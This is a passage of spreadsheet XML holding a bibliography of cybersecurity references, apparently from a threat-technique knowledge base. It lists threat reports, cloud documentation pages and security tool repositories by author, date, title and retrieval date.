    <t>Harbour, N. (2010, July 15). Malware Persistence without the Windows Registry. Retrieved November 17, 2020.</t>
  </si>
  <si>
    <t>Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.</t>
  </si>
  <si>
    <t>Kimberly Goody, Jeremy Kennelly, Joshua Shilko, Steve Elovitz, Douglas Bienstock. (2020, October 28). Unhappy Hour Special: KEGTAP and SINGLEMALT With a Ransomware Chaser. Retrieved October 28, 2020.</t>
  </si>
  <si>
    <t>Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says U.S. malware is more restrained than adversaries'. Retrieved January 17, 2019.</t>
  </si>
  <si>
    <t>Elovitz, S. &amp; Ahl, I. (2016, August 18). Know Your Enemy:  New Financially-Motivated &amp; Spear-Phishing Group. Retrieved February 26, 2018.</t>
  </si>
  <si>
    <t>Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who’s Reading Your Text Messages?. Retrieved May 11, 2020.</t>
  </si>
  <si>
    <t>Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail! Enterprise Email Compromise. Retrieved April 22, 2019.</t>
  </si>
  <si>
    <t>Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020.</t>
  </si>
  <si>
    <t>Sierra, E., Iglesias, G.. (2018, April 24). Metamorfo Campaigns Targeting Brazilian Users. Retrieved July 30, 2020.</t>
  </si>
  <si>
    <t>Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>Maniath, S. and Kadam P. (2019, March 19). Dissecting a NETWIRE Phishing Campaign's Usage of Process Hollowing. Retrieved January 7, 2021.</t>
  </si>
  <si>
    <t>Dawda, U. and Villeneuve, N. (2013, August 30). Njw0rm - Brother From the Same Mother. Retrieved June 4, 2019.</t>
  </si>
  <si>
    <t>Bohannon, D. &amp; Carr N. (2017, June 30). Obfuscation in the Wild: Targeted Attackers Lead the Way in Evasion Techniques. Retrieved February 12, 2018.</t>
  </si>
  <si>
    <t>FireEye Labs. (2015, April 18). Operation RussianDoll: Adobe &amp; Windows Zero-Day Exploits Likely Leveraged by Russia’s APT28 in Highly-Targeted Attack. Retrieved April 24, 2017.</t>
  </si>
  <si>
    <t>Ned Moran, Mike Scott, Mike Oppenheim of FireEye. (2014, November 3). Operation Poisoned Handover: Unveiling Ties Between APT Activity in Hong Kong’s Pro-Democracy Movement. Retrieved April 18, 2019.</t>
  </si>
  <si>
    <t>Moran, N., et al. (2014, November 21). Operation Double Tap. Retrieved January 14, 2016.</t>
  </si>
  <si>
    <t>Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved April 1, 2016.</t>
  </si>
  <si>
    <t>Villeneuve, N. et al.. (2013). OPERATION SAFFRON ROSE . Retrieved May 28, 2020.</t>
  </si>
  <si>
    <t>McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved June 23, 2020.</t>
  </si>
  <si>
    <t>FireEye Labs. (2014, May 20). The PLA and the 8:00am-5:00pm Work Day: FireEye Confirms DOJ’s Findings on APT1 Intrusion Activity. Retrieved November 4, 2014.</t>
  </si>
  <si>
    <t>Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.</t>
  </si>
  <si>
    <t>FireEye. (2018, March 16). Suspected Chinese Cyber Espionage Group (TEMP.Periscope) Targeting U.S. Engineering and Maritime Industries. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>FireEye. (2014). POISON IVY: Assessing Damage and Extracting Intelligence. Retrieved November 12, 2014.</t>
  </si>
  <si>
    <t>Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016.</t>
  </si>
  <si>
    <t>Zafra, D. Lunden, K. Brubaker, N. Kennelly, J.. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. Retrieved February 9, 2021.</t>
  </si>
  <si>
    <t>Zafra, D., et al. (2020, February 24). Ransomware Against the Machine: How Adversaries are Learning to Disrupt Industrial Production by Targeting IT and OT. Retrieved March 2, 2021.</t>
  </si>
  <si>
    <t>Anubhav, A., Kizhakkinan, D. (2017, February 22). Spear Phishing Techniques Used in Attacks Targeting the Mongolian Government. Retrieved February 24, 2017.</t>
  </si>
  <si>
    <t>Scavella, T. and Rifki, A. (2017, July 20). Are you Ready to Respond? (Webinar). Retrieved October 4, 2017.</t>
  </si>
  <si>
    <t>Bohannon, D. &amp; Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved February 12, 2018.</t>
  </si>
  <si>
    <t>Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020.</t>
  </si>
  <si>
    <t>FireEye. (2021, June 16). Smoking Out a DARKSIDE Affiliate’s Supply Chain Software Compromise. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Stephen Eckels, Jay Smith, William Ballenthin. (2020, December 24). SUNBURST Additional Technical Details. Retrieved January 6, 2021.</t>
  </si>
  <si>
    <t>FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.</t>
  </si>
  <si>
    <t>Smith, L., Leathery, J., Read, B. (2021, March 4). New SUNSHUTTLE Second-Stage Backdoor Uncovered Targeting U.S.-Based Entity; Possible Connection to UNC2452. Retrieved March 12, 2021.</t>
  </si>
  <si>
    <t>FireEye. (2016, November 30). FireEye Responds to Wave of Destructive Cyber Attacks in Gulf Region. Retrieved January 11, 2017.</t>
  </si>
  <si>
    <t>FireEye. (2021, May 11). Shining a Light on DARKSIDE Ransomware Operations. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>Moran, N. (2013, May 20). Ready for Summer: The Sunshop Campaign. Retrieved March 19, 2018.</t>
  </si>
  <si>
    <t>FireEye Intelligence . (2018, October 23). TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>Miller, S., et al. (2019, April 10). TRITON Appendix C. Retrieved April 29, 2019.</t>
  </si>
  <si>
    <t>Vaish, A. &amp; Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved December 18, 2017.</t>
  </si>
  <si>
    <t>Johnson, B, et. al. (2017, December 14). Attackers Deploy New ICS Attack Framework "TRITON" and Cause Operational Disruption to Critical Infrastructure. Retrieved January 6, 2021.</t>
  </si>
  <si>
    <t>Miller, S, et al. (2019, April 10). TRITON Actor TTP Profile, Custom Attack Tools, Detections, and ATT&amp;CK Mapping. Retrieved April 16, 2019.</t>
  </si>
  <si>
    <t>Singh, S., Yin, H. (2016, May 22). https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html. Retrieved April 5, 2018.</t>
  </si>
  <si>
    <t>Vaish, A. &amp; Nemes, S. (2017, November 28). Newly Observed Ursnif Variant Employs Malicious TLS Callback Technique to Achieve Process Injection. Retrieved June 5, 2019.</t>
  </si>
  <si>
    <t>Cole, R., Moore, A., Stark, G., Stancill, B. (2020, February 5). STOMP 2 DIS: Brilliance in the (Visual) Basics. Retrieved September 17, 2020.</t>
  </si>
  <si>
    <t>Ballenthin, W., et al. (2015). Windows Management Instrumentation (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016.</t>
  </si>
  <si>
    <t>Devon Kerr. (2015). There's Something About WMI. Retrieved May 4, 2020.</t>
  </si>
  <si>
    <t>Berry, A., Homan, J., and Eitzman, R. (2017, May 23). WannaCry Malware Profile. Retrieved March 15, 2019.</t>
  </si>
  <si>
    <t>FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. Retrieved December 4, 2015.</t>
  </si>
  <si>
    <t>Moran, N. and Lanstein, A.. (2014, March 25). Spear Phishing the News Cycle: APT Actors Leverage Interest in the Disappearance of Malaysian Flight MH 370. Retrieved April 15, 2016.</t>
  </si>
  <si>
    <t>Harbour, N. (2011, June 3). What the fxsst?. Retrieved November 17, 2020.</t>
  </si>
  <si>
    <t>FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye. Retrieved March 6, 2017.</t>
  </si>
  <si>
    <t>Hamilton, C. (2019, June 4). Hunting COM Objects. Retrieved June 10, 2019.</t>
  </si>
  <si>
    <t>Platt, J. and Reeves, J.. (2019, March). FIN7 Revisited: Inside Astra Panel and SQLRat Malware. Retrieved June 18, 2019.</t>
  </si>
  <si>
    <t>Dan Whalen. (2019, September 10). Following the CloudTrail: Generating strong AWS security signals with Sumo Logic. Retrieved October 16, 2020.</t>
  </si>
  <si>
    <t>Brewster, T. (2017, May 4). https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates/#601c77842a0a. Retrieved June 15, 2020.</t>
  </si>
  <si>
    <t>Sandvik, R. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Dela Paz, R. (2016, October 21). BITTER: a targeted attack against Pakistan. Retrieved June 1, 2022.</t>
  </si>
  <si>
    <t>Griffin, N. (2017, January 17). CARBANAK GROUP USES GOOGLE FOR MALWARE COMMAND-AND-CONTROL. Retrieved February 15, 2017.</t>
  </si>
  <si>
    <t>Somerville, L. and Toro, A. (2017, March 30). Playing Cat &amp; Mouse: Introducing the Felismus Malware. Retrieved November 16, 2017.</t>
  </si>
  <si>
    <t>Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. Retrieved September 22, 2016.</t>
  </si>
  <si>
    <t>Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>Neeamni, D., Rubinfeld, A.. (2021, July 1). Diavol - A New Ransomware Used By Wizard Spider?. Retrieved November 12, 2021.</t>
  </si>
  <si>
    <t>Xiaopeng Zhang. (2017, May 3). Deep Analysis of New Emotet Variant – Part 1. Retrieved April 1, 2019.</t>
  </si>
  <si>
    <t>Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.</t>
  </si>
  <si>
    <t>Zhang, X. (2020, February 4). Another Metamorfo Variant Targeting Customers of Financial Institutions in More Countries. Retrieved July 30, 2020.</t>
  </si>
  <si>
    <t>Bacurio, F., Salvio, J. (2017, February 14). REMCOS: A New RAT In The Wild. Retrieved November 6, 2018.</t>
  </si>
  <si>
    <t>Bacurio Jr., F. and Salvio, J. (2018, April 9). Trickbot’s New Reconnaissance Plugin. Retrieved February 14, 2019.</t>
  </si>
  <si>
    <t>Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.</t>
  </si>
  <si>
    <t>Prins, R. (2015, February 16). Anunak (aka Carbanak) Update. Retrieved January 20, 2017.</t>
  </si>
  <si>
    <t>Dantzig, M. v., Schamper, E. (2019, December 19). Operation Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved October 8, 2020.</t>
  </si>
  <si>
    <t>Free Desktop. (2006, February 13). Desktop Application Autostart Specification. Retrieved September 12, 2019.</t>
  </si>
  <si>
    <t>Free Desktop. (2017, December 24). Recognized Desktop Entry Keys. Retrieved September 12, 2019.</t>
  </si>
  <si>
    <t>freedesktop.org. (n.d.). systemd-journald.service. Retrieved June 15, 2022.</t>
  </si>
  <si>
    <t>Freedesktop.org. (2018, September 29). systemd System and Service Manager. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>Ulf Frisk. (2016, August 5). Direct Memory Attack the Kernel. Retrieved March 30, 2018.</t>
  </si>
  <si>
    <t>Doctor Web. (2014, November 21). Linux.BackDoor.Fysbis.1. Retrieved December 7, 2017.</t>
  </si>
  <si>
    <t>Bryan Lee and Rob Downs. (2016, February 12). A Look Into Fysbis: Sofacy’s Linux Backdoor. Retrieved September 10, 2017.</t>
  </si>
  <si>
    <t>Han, Karsten. (2019, June 4). Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Jackson, William. (2011, June 7). RSA confirms its tokens used in Lockheed hack. Retrieved September 24, 2018.</t>
  </si>
  <si>
    <t>Google. (2020, April 23). Creating and Starting a VM instance. Retrieved May 1, 2020.</t>
  </si>
  <si>
    <t>Google. (n.d.). Create Cloud Identity user accounts. Retrieved January 29, 2020.</t>
  </si>
  <si>
    <t>Google Cloud. (2022, March 31). Monitor usage patterns for service accounts and keys . Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Google Cloud. (n.d.). Packet Mirroring overview. Retrieved March 17, 2022.</t>
  </si>
  <si>
    <t>Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020.</t>
  </si>
  <si>
    <t>Spencer Gietzen. (2019, February 26). Google Cloud Platform (GCP) Bucket Enumeration and Privilege Escalation. Retrieved March 4, 2022.</t>
  </si>
  <si>
    <t>G DATA. (2014, October). COM Object hijacking: the discreet way of persistence. Retrieved August 13, 2016.</t>
  </si>
  <si>
    <t>Ebach, L. (2017, June 22). Analysis Results of Zeus.Variant.Panda. Retrieved November 5, 2018.</t>
  </si>
  <si>
    <t>McNamara, R. (2017, September 5). Linux Based Inter-Process Code Injection Without Ptrace(2). Retrieved February 21, 2020.</t>
  </si>
  <si>
    <t>glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020.</t>
  </si>
  <si>
    <t>GMER. (n.d.). GMER. Retrieved December 12, 2017.</t>
  </si>
  <si>
    <t>GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.</t>
  </si>
  <si>
    <t>Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020.</t>
  </si>
  <si>
    <t>Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.</t>
  </si>
  <si>
    <t>GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.</t>
  </si>
  <si>
    <t>Emilio Pinna, Andrea Cardaci. (n.d.). GTFOBins. Retrieved January 28, 2022.</t>
  </si>
  <si>
    <t>Emilio Pinna, Andrea Cardaci. (n.d.). gtfobins at. Retrieved September 28, 2021.</t>
  </si>
  <si>
    <t>Jon Gabilondo. (2019, September 22). How to Inject Code into Mach-O Apps. Part II.. Retrieved March 24, 2021.</t>
  </si>
  <si>
    <t>Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016.</t>
  </si>
  <si>
    <t>Ge, L. (2011, September 9). BIOS Threat is Showing up Again!. Retrieved November 14, 2014.</t>
  </si>
  <si>
    <t>Gemini Advisory. (2021, October 21). FIN7 Recruits Talent For Push Into Ransomware. Retrieved February 2, 2022.</t>
  </si>
  <si>
    <t>Deply, B. (2014, January 13). Pass the ticket. Retrieved June 2, 2016.</t>
  </si>
  <si>
    <t>Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020.</t>
  </si>
  <si>
    <t>Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.</t>
  </si>
  <si>
    <t>Stepanic, D. (2018, September 2). attck_empire: Generate ATT&amp;CK Navigator layer file from PowerShell Empire agent logs. Retrieved March 11, 2019.</t>
  </si>
  <si>
    <t>Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator. Retrieved December 16, 2020.</t>
  </si>
  <si>
    <t>Robbins, A., Vazarkar, R., and Schroeder, W. (2016, April 17). Bloodhound: Six Degrees of Domain Admin. Retrieved March 5, 2019.</t>
  </si>
  <si>
    <t>TheWover. (2021, April 21). CertStealer. Retrieved August 2, 2022.</t>
  </si>
  <si>
    <t>HarmJ0y et al. (2021, June 9). Certify. Retrieved August 4, 2022.</t>
  </si>
  <si>
    <t>Runa A. Sandvik. (2014, January 14). Attackers Scrape GitHub For Cloud Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved August 9, 2022.</t>
  </si>
  <si>
    <t>Robertson, K. (2016, August 28). Conveigh. Retrieved November 17, 2017.</t>
  </si>
  <si>
    <t>Flathers, R. (2018, February 19). creddump7. Retrieved April 11, 2018.</t>
  </si>
  <si>
    <t>Spencer S. (2018, February 22). DCSYNCMonitor. Retrieved March 30, 2018.</t>
  </si>
  <si>
    <t>Mello, V. (2018, March 8). Diamorphine - LMK rootkit for Linux Kernels 2.6.x/3.x/4.x (x86 and x86_64). Retrieved April 9, 2018.</t>
  </si>
  <si>
    <t>Dormann, W. (2017, October 20). Disable DDEAUTO for Outlook, Word, OneNote, and Excel versions 2010, 2013, 2016. Retrieved February 3, 2018.</t>
  </si>
  <si>
    <t>HarmJ0y &amp; subat0mik. (2018, August 22). SharpDPAPI - Certificates. Retrieved August 2, 2022.</t>
  </si>
  <si>
    <t>Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Dunning, J. (2016, August 1). Hashjacking. Retrieved December 21, 2017.</t>
  </si>
  <si>
    <t>NSA IAD. (2017, January 24). MS Security Guide. Retrieved December 18, 2017.</t>
  </si>
  <si>
    <t>Robertson, K. (2015, April 2). Inveigh: Windows PowerShell ADIDNS/LLMNR/mDNS/NBNS spoofer/man-in-the-middle tool. Retrieved March 11, 2019.</t>
  </si>
  <si>
    <t>Bohannon, D.. (2017, March 13). Invoke-Obfuscation - PowerShell Obfuscator. Retrieved June 18, 2017.</t>
  </si>
  <si>
    <t>Adams, B. (2017, December 17). Invoke-PSImage. Retrieved April 10, 2018.</t>
  </si>
  <si>
    <t>Zanni, A. (n.d.). The LaZagne Project !!!. Retrieved December 14, 2018.</t>
  </si>
  <si>
    <t>wdormann. (2019, August 29). Disable Windows Explorer file associations for Disc Image Mount. Retrieved April 16, 2022.</t>
  </si>
  <si>
    <t>Bullock, B., . (2018, November 20). MailSniper. Retrieved October 4, 2019.</t>
  </si>
  <si>
    <t>Mudge, R. (2014, July 14). Github Malleable-C2-Profiles safebrowsing.profile. Retrieved June 18, 2017.</t>
  </si>
  <si>
    <t>Orrù, M., Trotta, G.. (2019, September 11). Muraena. Retrieved October 14, 2019.</t>
  </si>
  <si>
    <t>Warren, J. (2017, June 22). lsadump::changentlm and lsadump::setntlm work, but generate Windows events #92. Retrieved December 4, 2017.</t>
  </si>
  <si>
    <t>Deply, B., Le Toux, V.. (2016, June 5). module ~ kerberos. Retrieved March 17, 2020.</t>
  </si>
  <si>
    <t>Deply, B., Le Toux, V. (2016, June 5). module ~ lsadump. Retrieved August 7, 2017.</t>
  </si>
  <si>
    <t>Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz. Retrieved June 20, 2019.</t>
  </si>
  <si>
    <t>Nomex. (2014, February 7). NBNSpoof. Retrieved November 17, 2017.</t>
  </si>
  <si>
    <t>gremwell. (2020, March 24). Office 365 User Enumeration. Retrieved May 27, 2022.</t>
  </si>
  <si>
    <t>Carr, N. (2016, August 14). OfficeCrackros. Retrieved February 12, 2018.</t>
  </si>
  <si>
    <t>Yair, O. (2019, August 19). Invisi-Shell. Retrieved June 24, 2020.</t>
  </si>
  <si>
    <t>Barrett Adams. (n.d.). Invoke-PSImage . Retrieved September 30, 2022.</t>
  </si>
  <si>
    <t>HarmJ0y et al. (2021, June 16). PSPKIAudit. Retrieved August 2, 2022.</t>
  </si>
  <si>
    <t>Rhino Security Labs. (2019, August 22). Pacu. Retrieved October 17, 2019.</t>
  </si>
  <si>
    <t>LiveMirror. (2014, September 17). PcShare. Retrieved October 11, 2022.</t>
  </si>
  <si>
    <t>Ryan Hanson. (2016, September 24). phishery. Retrieved October 23, 2020.</t>
  </si>
  <si>
    <t>Nettitude. (2018, July 23). Python Server for PoshC2. Retrieved April 23, 2019.</t>
  </si>
  <si>
    <t>PowerShellMafia. (2012, May 26). PowerSploit - A PowerShell Post-Exploitation Framework. Retrieved February 6, 2018.</t>
  </si>
  <si>
    <t>Nicolas Verdier. (n.d.). Retrieved January 29, 2018.</t>
  </si>
  <si>
    <t>MaxXor. (n.d.). QuasarRAT. Retrieved July 10, 2018.</t>
  </si>
  <si>
    <t>Stringer, M.. (2018, November 21). RainDance. Retrieved October 6, 2019.</t>
  </si>
  <si>
    <t>Augusto, I. (2018, March 8). Reptile - LMK Linux rootkit. Retrieved April 9, 2018.</t>
  </si>
  <si>
    <t>Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.</t>
  </si>
  <si>
    <t>Bohannon, D. (2017, July 27). Revoke-Obfuscation. Retrieved February 12, 2018.</t>
  </si>
  <si>
    <t>NSA IAD. (2017, April 20). Secure Host Baseline - Credential Guard. Retrieved April 25, 2017.</t>
  </si>
  <si>
    <t>Salvati, M (2019, August 6). SILENTTRINITY. Retrieved March 23, 2022.</t>
  </si>
  <si>
    <t>Salvati, M. (2019, August 6). SILENTTRINITY Modules. Retrieved March 24, 2022.</t>
  </si>
  <si>
    <t>Graeber, M. (2017, September 14). PoCSubjectInterfacePackage. Retrieved January 31, 2018.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver. Retrieved September 15, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver DNS C2 . Retrieved September 15, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver Download. Retrieved September 16, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver Transport Encryption. Retrieved September 16, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (2021, August 18). Sliver Filesystem. Retrieved September 22, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver HTTP(S) C2. Retrieved September 16, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver Ifconfig. Retrieved September 16, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver Netstat. Retrieved September 16, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver Screenshot. Retrieved September 16, 2021.</t>
  </si>
  <si>
    <t>BishopFox. (n.d.). Sliver Upload. Retrieved September 16, 2021.</t>
  </si>
  <si>
    <t>TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021.</t>
  </si>
  <si>
    <t>Moe, O. (2018, March 1). Ultimate AppLocker Bypass List. Retrieved April 10, 2018.</t>
  </si>
  <si>
    <t>Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October 19, 2020.</t>
  </si>
  <si>
    <t>Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February 17, 2021.</t>
  </si>
  <si>
    <t>Twi1ight. (2015, July 11). AD-Pentest-Script - wmiexec.vbs. Retrieved June 29, 2017.</t>
  </si>
  <si>
    <t>Intel. (2017, March 18). CHIPSEC Platform Security Assessment Framework. Retrieved March 20, 2017.</t>
  </si>
  <si>
    <t>Wardle, P., Ross, C. (2018, April 8). EmpireProject Create Dylib Hijacker. Retrieved April 1, 2021.</t>
  </si>
  <si>
    <t>Wardle, P., Ross, C. (2017, September 21). Empire Project Dylib Hijack Vulnerability Scanner. Retrieved April 1, 2021.</t>
  </si>
  <si>
    <t>Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8, 2021.</t>
  </si>
  <si>
    <t>Magius, J., et al. (2017, July 19). Koadic. Retrieved June 18, 2018.</t>
  </si>
  <si>
    <t>DiabloHorn. (2015, March 22). mempdump. Retrieved October 6, 2017.</t>
  </si>
  <si>
    <t>Smeets, M. (2016, September 26). NetshHelperBeacon. Retrieved February 13, 2017.</t>
  </si>
  <si>
    <t>gtworek. (2019, December 17). NoRunDll. Retrieved August 23, 2021.</t>
  </si>
  <si>
    <t>Haight, J. (2016, April 21). PS&gt;Attack. Retrieved June 1, 2016.</t>
  </si>
  <si>
    <t>Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.</t>
  </si>
  <si>
    <t>Bialek, J. (2015, December 16). Invoke-NinjaCopy.ps1. Retrieved June 2, 2016.</t>
  </si>
  <si>
    <t>Rapid7. (2013, November 26). meterpreter/source/extensions/priv/server/elevate/. Retrieved July 8, 2018.</t>
  </si>
  <si>
    <t>UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.</t>
  </si>
  <si>
    <t>Lundgren, S. (2017, October 28). w32time. Retrieved March 26, 2018.</t>
  </si>
  <si>
    <t>Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019.</t>
  </si>
  <si>
    <t>Sandvik, Runa. (2021, October 18). Green Lambert and ATT&amp;CK. Retrieved March 21, 2022.</t>
  </si>
  <si>
    <t>Shukrun, S. (2019, June 2). Office Templates and GlobalDotName - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.</t>
  </si>
  <si>
    <t>Google. (n.d.). Turn Gmail delegation on or off. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Pascal Nowack. (n.d.). Retrieved September 21, 2021.</t>
  </si>
  <si>
    <t>Zuzana Hromcová. (2019, July 8). Malicious campaign targets South Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.</t>
  </si>
  <si>
    <t>Google. (2019, October 7). Restoring and deleting persistent disk snapshots. Retrieved October 8, 2019.</t>
  </si>
  <si>
    <t>Google. (2020, June 23). gcloud iam service-accounts list. Retrieved August 4, 2020.</t>
  </si>
  <si>
    <t>Google Cloud. (2022, March 31). gcloud compute instances add-metadata. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Google. (n.d.). Key rotation. Retrieved October 18, 2019.</t>
  </si>
  <si>
    <t>Google Cloud. (2022, March 31). Understanding policies. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Google. (n.d.). Retrieved March 16, 2021.</t>
  </si>
  <si>
    <t>Chris Moberly. (2020, February 12). Tutorial on privilege escalation and post exploitation tactics in Google Cloud Platform environments. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Google Cloud. (2022, March 31). Creating short-lived service account credentials. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Google. (n.d.). Cloud Storage. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Google. (2019, September 16). Best practices for Cloud Storage. Retrieved October 4, 2019.</t>
  </si>
  <si>
    <t>Google. (2019, October 3). Quickstart: Using the dashboard. Retrieved October 8, 2019.</t>
  </si>
  <si>
    <t>Google. (n.d.). gcloud compute instances list. Retrieved May 26, 2020.</t>
  </si>
  <si>
    <t>Stolyarov, V. (2022, March 17). Exposing initial access broker with ties to Conti. Retrieved August 18, 2022.</t>
  </si>
  <si>
    <t>Huntley, S. (2020, October 16). How We're Tackling Evolving Online Threats. Retrieved March 24, 2021.</t>
  </si>
  <si>
    <t>Google. (2011, June 1). Ensuring your information is safe online. Retrieved April 1, 2022.</t>
  </si>
  <si>
    <t>Google. (n.d.). Federating Google Cloud with Active Directory. Retrieved March 13, 2020.</t>
  </si>
  <si>
    <t>Google. (n.d.). Rest Resource: instance. Retrieved March 3, 2020.</t>
  </si>
  <si>
    <t>Weidemann, A. (2021, January 25). New campaign targeting security researchers. Retrieved December 20, 2021.</t>
  </si>
  <si>
    <t>Huntley, S. (2022, March 7). An update on the threat landscape. Retrieved March 16, 2022.</t>
  </si>
  <si>
    <t>Google. (n.d.). Virtual machine instances. Retrieved October 13, 2021.</t>
  </si>
  <si>
    <t>Google. (2019, September 23). Virtual Private Cloud (VPC) network overview. Retrieved October 6, 2019.</t>
  </si>
  <si>
    <t>GovCERT. (2016, May 23). Technical Report about the Espionage Case at RUAG. Retrieved November 7, 2018.</t>
  </si>
  <si>
    <t>Graeber, M. (2014, October). Analysis of Malicious Security Support Provider DLLs. Retrieved March 1, 2017.</t>
  </si>
  <si>
    <t>GrimHacker. (2017, July 24). Office365 ActiveSync Username Enumeration. Retrieved December 9, 2021.</t>
  </si>
  <si>
    <t>Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.</t>
  </si>
  <si>
    <t>Matveeva, V. (2017, August 15). Secrets of Cobalt. Retrieved October 10, 2018.</t>
  </si>
  <si>
    <t>Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved July 16, 2021.</t>
  </si>
  <si>
    <t>Skulkin, O. (2019, August 5). Following the RTM Forensic examination of a computer infected with a banking trojan. Retrieved May 11, 2020.</t>
  </si>
  <si>
    <t>Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020.</t>
  </si>
  <si>
    <t>Group IB. (2020, September). LOCK LIKE  A PRO. Retrieved September 27, 2021.</t>
  </si>
  <si>
